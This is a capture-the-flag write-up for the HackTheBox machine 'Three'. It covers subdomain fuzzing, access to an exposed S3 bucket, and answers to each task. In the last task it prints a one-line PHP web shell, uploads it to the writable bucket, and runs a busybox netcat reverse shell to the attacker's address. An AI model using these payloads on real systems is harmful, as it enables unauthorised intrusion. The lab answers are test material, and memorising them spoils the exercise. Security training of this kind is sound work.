Starting Point HackTheBox
Machine name: Three
Task 1
- How many TCP ports are open?
First, let’s scan the target
Answer: 2
Task 2
- What is the domain of the email address provided in the “Contact” section of the website?
Going over to the web page shows this
Checking the Contact page shows this email address
We can see the domain name
Answer: thetoppers.htb
Task 3
- In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
For this we need to edit our /etc/hosts file so that the hostname resolves to the target's IP address
Answer: /etc/hosts
Task 4
- Which sub-domain is discovered during further enumeration?
Let us fuzz for subdomains using ffuf
The result shows that the s3 subdomain is up
So I’ll add s3.thetoppers.htb to my /etc/hosts file
Answer: s3.thetoppers.htb
Task 5
- Which service is running on the discovered sub-domain?
Since the subdomain name looks interesting, I’ll search for it on Google
From the result we can tell the answer is Amazon S3
Answer: Amazon S3
Task 6
- Which command line utility can be used to interact with the service running on the discovered sub-domain?
Searching Google for this gives the answer
Answer: awscli
Task 7
- Which command is used to set up the AWS CLI installation?
I installed the aws tool from here
So to set up the AWS CLI we use aws configure
Answer: aws configure
Task 8
- What is the command used by the above utility to list all of the S3 buckets?
To list all of the S3 buckets we use:
Answer: aws s3 ls
But doing that on the target shows this
It is trying to access the main Amazon AWS endpoint
But we just need to point it at the endpoint already given to us
So I did this
Cool, we see the index.php & .htaccess files
Task 9
- This server is configured to run files written in what web scripting language?
Back to the web app
Using wappalyzer shows the language of the web server
Answer: PHP
Task 10
- Submit the root flag
Since we know the S3 bucket allows write access, we can put files into it
But let us first download the index.php file
Opening it shows that this bucket is the web root directory of the web server on port 80
Cool. So this means we can upload our own file to the server
I created a file named shell.php with this content:
<?php system($_GET['cmd']); ?>
Now I uploaded it to the bucket
aws s3 --endpoint http://s3.thetoppers.htb cp shell.php s3://thetoppers.htb/
Our shell is uploaded; we can now access it from the web server
We are user www-data. Let’s get a reverse shell
Payload: http://thetoppers.htb/shell.php?cmd=busybox%20nc%2010.10.14.27%201337%20-e%20/bin/bash
The flag is there :)